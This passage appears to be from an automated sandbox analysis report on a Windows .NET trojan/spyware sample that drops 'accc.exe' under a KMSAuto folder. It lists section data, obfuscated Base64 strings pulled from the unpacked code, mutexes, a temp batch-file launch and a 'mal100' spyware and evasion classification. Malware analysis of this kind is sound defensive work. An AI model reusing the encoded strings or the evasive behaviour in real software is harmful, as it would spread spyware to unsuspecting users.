            Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe
            Source: nobtpajdjthawd.exe, 00000000.00000002.1275665949.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nobtpajdjthawd.exe
            Source: nobtpajdjthawd.exe, 00000000.00000000.1163505974.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
            Source: nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe
            Source: nobtpajdjthawd.exeBinary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
            Source: nobtpajdjthawd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: accc.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: nobtpajdjthawd.exeStatic PE information: Section: .CSS ZLIB complexity 1.0003119425768385
            Source: accc.exe.1.drStatic PE information: Section: .CSS ZLIB complexity 1.0003119425768385
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, WPJHIdWGZYOD.csBase64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.csBase64 encoded string: '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
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, ltCqRsWfGmt.csBase64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, ctleIqXFerYnq.csBase64 encoded string: 'H4sIAAAAAAAEADNNNDGucs7MLwxzKjbx9ynOLPSPDLQsM3XJcPUxL3P2AgDiONk/IAAAAA==', 'H4sIAAAAAAAEADM3NjKzNDAwMDaxcnR0TzNzjTIO9TW3DPBOSzbzCa9wLtQNMigwKi/PdTTwq8wHANMNQhsuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEAEtKNiwsLs9NKUuuLK9Kzi2oqEiuKCxLNU03SE/NM89ONy5JNKs0LarMSwUAr2cj/yoAAAA=', 'H4sIAAAAAAAEAA3KyQ2AIBAAwIZ8IIfYDqywJBwBJFzV67xHw1neEZ8Oa2yIeU6YpRuBBE2SHllT1xJ1JXPov6LzwbZNqeDUdgIsMD/FXdEolF1myiM6+QEXjvtIVQAAAA==', 'H4sIAAAAAAAEAHMxL3XySPMKyvX2S05OCTQrLA4r9EhxC/T28gk38ipILHMFANZUwu0iAAAA', 'H4sIAAAAAAAEAAXByQ6CMBAA0B/iADNd6JGZoRqXA7EY400WiweCRmyMX+97+VdpIzneyAMWVnocayycUMeFcWRgLPvag7eShQqjXn7ng9rcd/ojTVILv2LLjldqrdvaLFAXZk6UpgfMcJn2CpDjuznJcCzlWa3XP47SEipwAAAA', 'H4sIAAAAAAAEAMspSTYsTMuwSM4rNMoyLzI2yinJKTbJsyjOyEo1KrZINajMTk8rKizIM0kFAF28Kb4rAAAA', 'H4sIAAAAAAAEAAtxNE43za8K8zFxT/MyLXUJLDPJdy5MD3W2dC5xCjW39DAHAOi9REYiAAAA', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, oNAgephtBXblQ.csBase64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, UyzHBiQIUNlENT.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, UbVrQXWNvILJi.csBase64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, epgqLLdQoFNLhGcg.csBase64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, WPJHIdWGZYOD.csBase64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.csBase64 encoded string: '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
            Source: 14.2.accc.exe.3449550.0.raw.unpack, ltCqRsWfGmt.csBase64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
            Source: 14.2.accc.exe.3449550.0.raw.unpack, ctleIqXFerYnq.csBase64 encoded string: 'H4sIAAAAAAAEADNNNDGucs7MLwxzKjbx9ynOLPSPDLQsM3XJcPUxL3P2AgDiONk/IAAAAA==', 'H4sIAAAAAAAEADM3NjKzNDAwMDaxcnR0TzNzjTIO9TW3DPBOSzbzCa9wLtQNMigwKi/PdTTwq8wHANMNQhsuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEAEtKNiwsLs9NKUuuLK9Kzi2oqEiuKCxLNU03SE/NM89ONy5JNKs0LarMSwUAr2cj/yoAAAA=', 'H4sIAAAAAAAEAA3KyQ2AIBAAwIZ8IIfYDqywJBwBJFzV67xHw1neEZ8Oa2yIeU6YpRuBBE2SHllT1xJ1JXPov6LzwbZNqeDUdgIsMD/FXdEolF1myiM6+QEXjvtIVQAAAA==', 'H4sIAAAAAAAEAHMxL3XySPMKyvX2S05OCTQrLA4r9EhxC/T28gk38ipILHMFANZUwu0iAAAA', 'H4sIAAAAAAAEAAXByQ6CMBAA0B/iADNd6JGZoRqXA7EY400WiweCRmyMX+97+VdpIzneyAMWVnocayycUMeFcWRgLPvag7eShQqjXn7ng9rcd/ojTVILv2LLjldqrdvaLFAXZk6UpgfMcJn2CpDjuznJcCzlWa3XP47SEipwAAAA', 'H4sIAAAAAAAEAMspSTYsTMuwSM4rNMoyLzI2yinJKTbJsyjOyEo1KrZINajMTk8rKizIM0kFAF28Kb4rAAAA', 'H4sIAAAAAAAEAAtxNE43za8K8zFxT/MyLXUJLDPJdy5MD3W2dC5xCjW39DAHAOi9REYiAAAA', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, oNAgephtBXblQ.csBase64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
            Source: 14.2.accc.exe.3449550.0.raw.unpack, UyzHBiQIUNlENT.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, UbVrQXWNvILJi.csBase64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, epgqLLdQoFNLhGcg.csBase64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, kOdtKywYGaUi.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, kOdtKywYGaUi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 14.2.accc.exe.3449550.0.raw.unpack, kOdtKywYGaUi.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 14.2.accc.exe.3449550.0.raw.unpack, kOdtKywYGaUi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/19@1/1
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nobtpajdjthawd.exe.logJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7292
            Source: C:\ProgramData\KMSAuto\accc.exeMutant created: \Sessions\1\BaseNamedObjects\5a43zCioqVBs4OLsiqOYQ9v5DhEL7vCJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1252
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5148
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile created: C:\Users\user\AppData\Local\Temp\tmp5337.tmpJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""
            Source: nobtpajdjthawd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: nobtpajdjthawd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
